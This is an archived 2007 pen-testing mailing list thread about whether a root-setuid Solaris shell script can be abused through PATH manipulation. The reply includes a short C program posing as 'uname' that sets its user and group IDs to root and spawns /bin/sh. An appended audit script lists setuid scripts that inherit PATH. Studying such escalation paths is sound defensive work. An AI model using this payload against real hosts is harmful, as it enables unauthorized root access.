Penetration Testing mailing list archives
Re: solaris root-setuid script to gain root?
From: "Thomas Pollet" <thomas.pollet () gmail com>
Date: Sat, 30 Jun 2007 16:47:11 +0200
Hello,

On 30/06/07, Vitalik N. <robert.morris.jr () gmail com> wrote:
> Hi
>
> I was doing pen testing the other day and I found one root suid script
> left by some of the web developers:
>
> -rwsr-x--x 1 root users /home/web/c.cgi
>
> which is basically a bash script:
>
> ------ cut ------------
> #!/bin/sh
> uname
> ------ cut ------------
>
> And our system was recently compromised. Some local user was able to gain
> root access. Could this script be the way of gaining root access?
>
> According to
> http://www.unix.com/tips-and-tutorials/36711-the-whole-story-on-usr-bin-ksh.html
> "Because it was not possible to write a secure suid shell script, the
> concept of suid shell scripts was removed from Unix." But then it says
> "Solaris now supports suid shell" !
>
> I tried modifying the PATH variable and creating my own "uname" program.
> But my uname program runs with local user privs instead of root. I also
> tried the

did you put a setuid(0) in your uname program?
f.i.:

cat >uname.c<<EOF
#include <unistd.h>
int main (int argc, char **argv, char **envp) {
    setuid(0);
    setgid(0);
    execve("/bin/sh",argv,envp);
}
EOF

> other attack described in the link above: "link to -i" but this didn't
> work as well. So could this script be the problem?
>
> P.S: The machine runs SunOS 5.6 with all updates
Regards,
Thomas Pollet
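An audit a defender could run on a host where a file like c.cgi turned up, added here as an example and not part of either poster's message: it lists setuid/setgid files that are `#!` scripts and notes whether each one sets its own PATH, which the script quoted in the thread does not. The function name `find_suid_scripts` and the line-anchored PATH check (a heuristic) are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit a directory tree for setuid/setgid interpreter scripts.
# Run it as root so that files without read permission for others are covered.

# find_suid_scripts DIR  (hypothetical helper name)
# Prints one tab-separated line per finding:
#   <path> <interpreter line> <PATH=set|PATH=inherited|unreadable>
find_suid_scripts() {
    root=${1:-/}
    # -xdev: stay on one filesystem. -perm -4000 / -2000: setuid / setgid bit.
    # Assumes no newlines in file names (one path per line from find).
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
    while IFS= read -r f; do
        if [ ! -r "$f" ]; then
            # Cannot inspect the content; report it so it is not silently missed.
            printf '%s\t%s\t%s\n' "$f" '?' 'unreadable'
            continue
        fi
        # A script starts with the two bytes "#!"; compiled binaries do not.
        magic=$(dd if="$f" bs=2 count=1 2>/dev/null) || magic=
        [ "$magic" = '#!' ] || continue
        interp=$(head -n 1 "$f" 2>/dev/null) || interp='?'
        # Heuristic: does the script assign PATH itself, or does it resolve
        # commands such as "uname" through the caller's environment?
        if grep -Eq '^[[:space:]]*(export[[:space:]]+)?PATH=' "$f"; then
            state='PATH=set'
        else
            state='PATH=inherited'
        fi
        printf '%s\t%s\t%s\n' "$f" "$interp" "$state"
    done
}

# Stand-alone use: sh audit.sh /home/web
if [ "$#" -gt 0 ]; then
    find_suid_scripts "$1"
fi
```

Any line this prints is a candidate for removing the setuid bit or replacing the script with a small compiled wrapper; a script that sets PATH is still a finding, since PATH is only one of the inputs a setuid shell script inherits from its caller.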